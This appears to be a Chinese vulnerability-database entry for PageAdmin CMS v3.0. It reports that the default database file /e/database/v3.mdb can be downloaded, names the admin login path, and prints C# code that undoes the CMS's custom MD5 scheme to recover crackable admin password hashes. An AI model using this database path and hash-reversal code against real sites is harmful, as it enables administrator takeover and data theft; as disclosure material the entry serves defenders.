PageAdmin v3.0 /e/database/v3.mdb 数据库泄漏

基本字段

漏洞编号：: SSV-89424

披露/发现时间：: 未知

提交时间：: 2015-09-14

漏洞等级：

漏洞类别：: 信息泄漏

影响组件：: PageAdmin

漏洞作者：: 未知

提交者：: 匿名

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Supercheng 共获得 2.9KB

PageAdmin CMS V3.0版，默认数据库地址“/e/database/v3.mdb“，默认后台地址：“/e/master/login.aspx”，由于数据库地址未做限制，导致可以下载。通过逆向管理员MD5加密算法获得md5密文，并通过md5密文可以破解管理员密码。发现非常规MD5加密，于是使用ILSPY逆向源代码，查看加密方式<pre class="">public string Get_Md5(string s) { MD5 mD = new MD5CryptoServiceProvider(); Encoding encoding = Encoding.GetEncoding("UTF-8"); string s2 = "pageadmin cms"; byte[] array = mD.ComputeHash(encoding.GetBytes(s)); byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2)); StringBuilder stringBuilder = new StringBuilder(32); for (int i = 0; i < array.Length; i++) { stringBuilder.Append(((int)(array[i] + array2[i])).ToString("x").PadLeft(2, '0')); } </pre>这是逆向工具的代码：<pre class=""><code>public static String unPageAdminPass(String pstr) { MD5 mD = new MD5CryptoServiceProvider(); Encoding encoding = Encoding.GetEncoding("UTF-8"); string s2 = "pageadmin cms"; byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2)); StringBuilder stringBuilder = new StringBuilder(16); int index = 0; for (int i = 0; i < pstr.Length;) { //array[i] + array2[i]最小值为0,0的ascii码最小为30,最大为512,30的16进制为1E，512的16进制为200 //关键，这里如果错了，md5会逆向失败，这里只能大约计算通常不会小于20,如果小于，说明应该是3位长度 //如果破解异常，只能手工识别将密文分成16段，逆向回来 //通常取2个字符，如果是1开头或2开头需要取3位字符，如果2开头，可能为“200”，这种几率很小 String sd_s = pstr.Substring(i, 2); if (pstr.Substring(i, 3).StartsWith("200")) { //如果取3位为200，就取3位 sd_s = pstr.Substring(i, 3); i += 3; } else if (sd_s.StartsWith("1")) { //如果以sartNUM开头的同样取3位 sd_s=pstr.Substring(i, 3); i += 3; } else { i += 2; } if (sd_s.StartsWith("0")) { //0开头去掉（padleft填充了0，逆向回去，就要替换） sd_s = sd_s.Remove(0); } //165 9f e8 ec 102 189 9a a1 79 170 1ad 110 14e cd de 1a4 int t = Convert.ToInt32(sd_s, 16); int r = t - (int)array2[index]; stringBuilder.Append(r.ToString("x").PadLeft(2,'0')); index++; } return stringBuilder.ToString(); }</code></pre><img data-image-size="599,333" src="https://images.seebug.org/contribute/68277f77-c171-44bd-9145-9bd1a7980ee8-Clipboard Image.png" alt="Clipboard Image.png">